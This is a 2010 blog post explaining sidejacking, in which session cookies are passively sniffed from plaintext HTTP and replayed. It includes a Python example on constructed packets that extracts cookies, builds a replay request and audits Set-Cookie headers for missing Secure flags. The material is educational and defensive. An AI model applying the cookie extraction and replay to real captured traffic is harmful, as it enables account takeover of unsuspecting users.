Monday, 29 March 2010

Sidejacking (or how to "slip into" an authenticated HTTP session)

Sidejacking is a form of HTTP session hijacking that works by passive eavesdropping.
HTTP session hijacking is where the attacker grabs your session cookies. Your session with the web server is identified by a unique cookie: the server sends it to your browser (in a Set-Cookie header) when the session starts, usually right after you log in, and your browser echoes it back (in a Cookie header) on every request from that point forward. Whoever presents that cookie is, as far as the server can tell, you.

There are many forms of session hijacking. Some use cross-site scripting to grab the cookies from your browser. Some use man-in-the-middle attacks to intercept the connection and then resend it. Sidejacking uses passive eavesdropping of cookies: the attacker collects them with a packet sniffer, from any network segment where the traffic passes in the clear, and imports them into a browser. Unlike other methods of session hijacking, there is nothing the victim could possibly see that would tell them their session is being hijacked. They can't "View source" to find errant JavaScript (as they could with a cross-site-scripting attack), and they can't sniff their own traffic to see that it is being altered (as they could with a man-in-the-middle attack), because nothing on their connection changes.

In addition, sidejacking allows for offline attacks. Session cookies can last a long time, sometimes for years, when the server sets a far-future Expires or Max-Age on them. That means an attacker could capture packets with a sniffer at one point, then weeks later, in another part of the world, import the cookies into a browser and take over the session, as long as the cookie has not expired or been invalidated server-side (by a logout, for example).
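The two halves of the technique described above (pull the cookies out of sniffed plaintext HTTP, then replay them in a fresh request) plus the check a defender wants to run on a site's Set-Cookie headers, as an added example. This is not code from the original post and not Errata Security's Hamster/Ferret tools; the HTTP messages, host name and cookie values are constructed here to look like a sniffer's capture, and `AUDIT_TIME` is assumed to be the date of the post.

```python
"""Sidejacking worked through on constructed packet data (added example)."""
from __future__ import annotations

from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime

# Constructed: one plaintext HTTP request, as a passive sniffer sees it on the wire.
CAPTURED_REQUEST = (
    b"GET /inbox HTTP/1.1\r\n"
    b"Host: webmail.example\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Cookie: SID=a1b2c3d4e5f6; lang=en; remember=1\r\n"
    b"Accept: text/html\r\n"
    b"\r\n"
)

# Constructed: the response that set the cookie at the start of the session.
# No Secure attribute, far-future Expires: exactly what makes sidejacking work.
CAPTURED_RESPONSE_HEADERS = (
    b"HTTP/1.1 200 OK\r\n"
    b"Set-Cookie: SID=a1b2c3d4e5f6; Expires=Sat, 01 Jan 2050 00:00:00 GMT; Path=/\r\n"
    b"Set-Cookie: lang=en; Path=/\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
)

# Constructed: the same cookie set the way a hardened site would set it.
HARDENED_RESPONSE_HEADERS = (
    b"HTTP/1.1 200 OK\r\n"
    b"Set-Cookie: SID=a1b2c3d4e5f6; Secure; HttpOnly; Path=/\r\n"
    b"\r\n"
)

# Assumed "now" for the lifetime calculation: the date of the post.
AUDIT_TIME = datetime(2010, 3, 29, tzinfo=timezone.utc)


def parse_headers(raw: bytes) -> tuple[str, list[tuple[str, str]]]:
    """Split an HTTP message head into its start line and (name, value) header pairs."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    start_line, *lines = head.split("\r\n")
    headers = []
    for line in lines:
        name, _, value = line.partition(":")  # first colon only; values may contain ':'
        headers.append((name.strip().lower(), value.strip()))
    return start_line, headers


def extract_cookies(raw_request: bytes) -> dict[str, str]:
    """Pull every cookie the victim's browser sent; this is all the sniffer has to do."""
    _, headers = parse_headers(raw_request)
    cookies: dict[str, str] = {}
    for name, value in headers:
        if name == "cookie":
            for pair in value.split(";"):
                k, _, v = pair.strip().partition("=")
                cookies[k] = v
    return cookies


def build_replay_request(host: str, path: str, cookies: dict[str, str]) -> bytes:
    """The whole 'attack': send the captured cookies in a brand-new request.

    Nothing here touches the victim's connection, which is why the victim sees nothing.
    """
    cookie_header = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: {cookie_header}\r\n"
        "\r\n"
    ).encode("latin-1")


def audit_set_cookie(raw_response: bytes, now: datetime) -> dict[str, dict]:
    """Defender's check: which cookies are exposed to sidejacking, and for how long?

    A cookie without the Secure attribute is sent over plaintext HTTP and can be sniffed;
    a far-future Expires/Max-Age turns a single capture into a long-lived offline credential.
    """
    _, headers = parse_headers(raw_response)
    report: dict[str, dict] = {}
    for name, value in headers:
        if name != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cookie_name = parts[0].partition("=")[0]
        attrs = {p.partition("=")[0].lower(): p.partition("=")[2] for p in parts[1:]}
        lifetime = None  # None: a session cookie that dies with the browser
        if "max-age" in attrs:
            lifetime = timedelta(seconds=int(attrs["max-age"]))
        elif "expires" in attrs:
            lifetime = parsedate_to_datetime(attrs["expires"]) - now
        report[cookie_name] = {
            "secure": "secure" in attrs,
            "httponly": "httponly" in attrs,
            "lifetime_days": None if lifetime is None else lifetime.days,
        }
    return report


if __name__ == "__main__":
    stolen = extract_cookies(CAPTURED_REQUEST)
    print(build_replay_request("webmail.example", "/inbox", stolen).decode("latin-1"))
    print(audit_set_cookie(CAPTURED_RESPONSE_HEADERS, AUDIT_TIME))
    print(audit_set_cookie(HARDENED_RESPONSE_HEADERS, AUDIT_TIME))
```

The audit report for the captured response shows the SID cookie without Secure and with a lifetime of decades, which is the combination that lets a capture be replayed weeks later; the hardened variant carries Secure (so a browser never sends it over plaintext HTTP and a passive sniffer never sees it) and no Expires (so it dies with the browser). Marking the cookie Secure only helps if the site actually serves the authenticated pages over HTTPS; otherwise the browser has nothing to send it over.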

http://erratasec.blogspot.it/2007/08/sidejacking-with-hamster_05.html

http://erratasec.blogspot.it/2008/01/more-sidejacking.html